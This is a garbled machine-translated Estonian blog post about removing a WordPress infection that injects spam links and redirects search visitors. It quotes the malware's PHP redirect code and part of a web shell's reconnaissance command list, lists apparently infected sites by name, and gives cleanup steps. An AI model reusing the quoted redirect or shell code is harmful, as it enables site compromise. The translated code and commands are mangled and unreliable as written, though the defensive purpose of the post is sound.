Blogosfääris viirus ... aga ma olen olnud on?!

Viimase kuu olen saanud hoiatusi viirus blogi mõnel külastajaid. Esialgu ma ignoreeris hoiatusi, sest ma installitud päris hea viirusetõrje (Kaspersky AV 2009) Ja kuigi blogi pikka aega, ma ei ole kunagi saanud viiruse alert (.. Ma nägin midagi kahtlast varem, et esimene värskenda kadunud. Lõpuks ...).
Aeglaselt hakkasid ilmuma suured erinevused külastaja liiklustPärast mida liiklus viimasel ajal on pidevalt vähenenud ja hakkas üha rohkem inimesi, kes ütlevad mulle, et stealthsettings.com see on virused. Eile sain kelleltki screenshot teha, kui viirusetõrje blokeeritud käsikiri stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. See oli päris veenev mulle, et ma panin kõik allikatest otsida. Esimene mõte, mis tuli minu arvates oli teha upgrade uusim versioon WordPress (2.5.1), kuid mitte enne, kui vana script kustutada kõik failid WordPress ja teha varukoopia andmebaasi. See protseduur ei andnud mingeid tulemusi ja oleks ilmselt kulunud aega, et teada saada, kus buba oli, kui ta seda ei öelnud aastal arutelu selle üle, kohv, leidis ta, Google ja oleks hea, et teda näha.
MyDigitalLife.info avaldas artikli pealkirjaga "WordPress Hack: taastada ja parandada Google ja Otsingumootori või küpsist ei Liiklus suunatakse Su-Needs.info, AnyResults.Net, kuldsete Info.net ja muu ebaseadusliku Sites"See on lõpuks niit ma vajasin.
See on umbes ära kasutama WordPress põhineb cookie, Mis minu arvates on väga keeruline ja tehtud raamat. Nii tark, et teha SQL Injection Andmebaas blogi, luua nähtamatu kasutaja lihtne rutiinne kontroll armatuurlaud->kasutajad, kontrollida serveri katalooge ja faile "kirjutatav" (With chmod 777), otsida ja täitma faile privileege root kasutaja või grupp. Ma ei tea, kes ära nimi ja vaata, et vähe on artikleid kirjutanud temast, hoolimata asjaolust, et paljud blogid on nakatunud, kaasa arvatud Rumeenia. Ok ... Ma püüan seletada üldsõnaliseks viiruse kohta.

Mis on viirus?

Esmalt sisestage allikas lehekülgi blogisid, lingid nähtamatu külastajatele, vaid nähtav ja indexable otsingumootorid, eriti Google. Sel viisil üle lehekülje auaste saitidel näidatud ründaja. Teiseks lisatakse üks ümbersuunamine kood URL külastajad tulevad Google, Live, Yahoo, ... või RSS lugeja ja mitte ala küpsis. viirusetõrje tuvastab suunata nii Trojan-Clicker.HTML.

Sümptomid:

Massive langus külastajate liiklust, Eriti blogisid, kus on kõige rohkem külastajaid tulema Google.

Määramine: (Seega sai probleem nende jaoks, kes ei tea, kuidas, kuidas phpmyadmin, php ja Linux)

LA. TÄHELEPANU! Esimene teha varukoopia andmebaasi!

1. Kontrollige allikas faile index.php, header.php, footer.php, Blogi teema ja vaata, kas seal on kood, mis kasutab kodeerimist base64 või sisaldab "if ($ ser ==" 1? && sizeof ($ _COOKIE) == 0) "kujul:

<? Php
$ Seref = array ("Google", "msn", "elada", "Alta"
"Küsi", "yahoo", "AOL", "CNN", "ilm", "Alexa");
$ Ser = 0; foreach ($ Seref kui $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref)! == False) {$ ser = "1?; Break;}
if ($ ser == "1? && sizeof ($ _COOKIE) == 0) {header (" Location: http:// ". base64_decode (" YW55cmVzdWx0cy5uZXQ = '). "/") exit;
}>

... Või midagi. Kustuta see kood!

Klõpsa pilti ...

indeks kood

Siinsel eespool valisin kogemata "<? Php get_header ();?>". See kood peaks jääma.

2. Kasutama phpMyAdmin ja minna andmebaasi tabeli wp_usersKui vaadata, kui puudub kasutajatunnus luuakse 00:00:00 0000-00-00 (Võimalik paigutus USER_LOGIN kirjutada "WordPress". Kirjutage kasutajatunnus (väli ID) ja seejärel kustutage see.

Klõpsa pilti ...

libakasutaja

* Roheline joon tuleb eemaldada ja alles tema ID. Puhul Kas ID = 8 .

3. Mine tabel wp_usermeta, Kus asub ja eemaldama read ID (kui valdkonna USER_ID ID väärtus on kustutatud).

4. Tabelis wp_option, Ava active_plugins ja vaata, mis plugin on lubatud kahtlusalune. Seda saab kasutada nagu lõpud _old.giff, _old.pngg, _old.jpeg, _new.php.giffjne. Raamatud pildilaiendite kombinatsioonid koos _old ja _new.

SELECT * FROM wp_options KUS option_name = 'active_plugins "

Kustuta see plugin, siis minge blogi -> juhtpaneel -> Plugins, mis välja lülitada ning aktiveerida teatud plugin.

Kliki pildile, et näha tundub active_plugins viiruse faili.

plugin

Jälgi teed on FTP või SSH, märgitud active_plugins ja kustutab faili serverisse.

5. Kõik phpMyAdmin, tabelis wp_option, Leida ja kustutada rida sisaldab "rss_f541b3abd05e7962fcab37737f40fad8"Ja vahel"internal_links_cache ".
In internal_links_cache tehakse krüpteeritud rämpsposti lingid, mis ilmuvad oma blogis ja Google Adsense kood, Häkker.

6. Soovitatud on Parooli muutmine Blogi ja login eemaldada kõik kahtlased userele. Uuendada uusima versiooni WordPress ja määrata blogi ei võimalda registreerida uusi kasutajaid. Ei ole kahju ... ei saa kommenteerida ja ebaloogiline.

Üritasin eespool selgitada, kui palju, mida teha sellises olukorras, et puhastada blogi sellest viirusest. Probleem on palju halvem kui tundub ja isegi pole lahendatud, sest seda kasutatakse turvahaavatavusi veebiserveri hosting, mis on blogi.

Esimese turvameetmeid, kellel on juurdepääs SSHTee mõned kontroll server, et näha kas kõik failid nagu * _old * ja * _new. * Mis lõpud.GIFF. JPEG. pngg. jpgg. Need failid tuleks kustutada. Kui teil ümbernimetamiseks faili, näiteks. top_right_old.giff in top_right_old.phpMe näeme, et fail on täpselt kasutada koodi server.

Mõned kasulikud näpunäited serveri kontrollimiseks, puhastamiseks ja kinnitamiseks. (SSH-i kaudu)

1. cd / tmp ja vaadata, kas on kaustad nagu tmpVFlma või muud kombinatsioonid on sama nimi ja kustutada. Vaadake pildil kaks sellist kaustu mind:

tmpserver

rm-rf foldername

2. Kontrollige elimiati (chmod muuda) võimalikult kaustad atribuudid chmod 777

leidke kõik kirjutatavad files praeguses dir: Otsi. -Type F-perm-2-LS
kõik kirjutatav kataloogid praegune dir: Otsi. -Type D-perm-2-LS
leidke kõik kirjutatavad kataloogid ja files praeguses dir: Otsi. -Perm-2-LS

3. Otsid kahtlasi faile serverisse.

Otsi. -Name "* _new.php *"
Otsi. -Name "* _old.php *"
leida. -Nimi "* .jpgg"
leida. -Nimi "* _giff"
leida. -Nimi "* _pngg"

4, TÄHELEPANU! failid, mis seati natuke SUID si SGID. Need failid täita koos privileegid kasutaja (grupp) või juurtest, mitte kasutaja, kes täidavad faili. Need failid võivad põhjustada root kompromiss, kui julgeolekuküsimustes. Kui kasutad faile SUID ja SGID bitti, täitma "chmod 0 " või eemaldada pakend sisaldab neid.

Kasutada sisaldab kusagil allikas ...:

if (! $ safe_mode) {
if ($ os_type == "nix") {
$ Os. = Käivita (sysctl-n kern.ostype ');
$ Os. = Käivita (sysctl-n kern.osrelease ');
$ Os. = Käivita (sysctl-n kernel.ostype ');
$ Os. = Käivita (sysctl-n kernel.osrelease ');
if (tühi ($ kasutaja)) $ user = täitmisest ("ID");
$ Varjunimed = array (
"=>"
'leia suid files '=>' leid / -tüüp f-perm -04000-l ',
'leia sgid files '=>' leid / -tüüp f-perm -02000-l ',
'leidke kõik kirjutatavad files praeguses dir '=>' leid. -tüüp f-perm -2-l ',
"Leia kõik kirjutatav kataloogid praegune dir '=>' leida. -Type D-perm-2-ls "
'leidke kõik kirjutatavad kataloogid ja files praeguses dir '=>' leid. kestvus -2-liitrit,
"Näita avatud pordid '=>' netstat-| grep-i kuulama"
);
} Else {
$ Os_name. = Execute ("ver");
$ User. = Execute ("echo% kasutajanimi% ');
$ Varjunimed = array (
"=>"
"Näita astmelaud teenused" => "net start"
"Näita protsess nimekiri '=>' tasklist"
);
}

Sel viisil ... põhiliselt leiab rikkumisi turvalisus. Ports avatud kataloogid "kirjutatav" ja grupp täitmise privileegid faili / root.

Tagasi enam ...

Mõned blogid nakatunud: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Nimekiri läheb edasi ... palju.

Saate kontrollida, kui blogi on viirus, kasutades Google otsingumootori. Copy & Paste:

site www.blegoo.com osta

Head ööd ja suurendada töö ;) Varsti ma tulla uudiseid Eugen prevezibil.imprevizibil.com.

BRB :)

TO: TÄHELEPANU! Muutuvad WordPress teema või uuendada WordPress 2.5.1, ei ole lahendus, et saada lahti see viirus.

Blogosfääris viirus ... aga ma olen olnud on?!

Andmeid autor

Kavalus

Kirglikult kõige vastu, mis tähendab vidinaid ja IT-sid, kirjutan heameelega stealthsettings.com saidil 2006 ja armastan avastada uusi asju arvutite ja macOS-i, Linuxi opsüsteemide, Windows, iOS ja Android.

Jäta kommentaar